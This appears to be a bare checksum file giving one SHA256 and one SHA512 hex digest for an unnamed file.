SHA256 0bd51e96004bc8255f661b7c4a243755e80e3cf0795ba02ae433ba0ae7a8049c
SHA512 62eed4f351d73e8b088b312514060b4157a48b56133c1980013210395eba1091f3e637efcc31bd3f7a95a854254a19acc90c3eb41a491cd4193cb0a08cd99263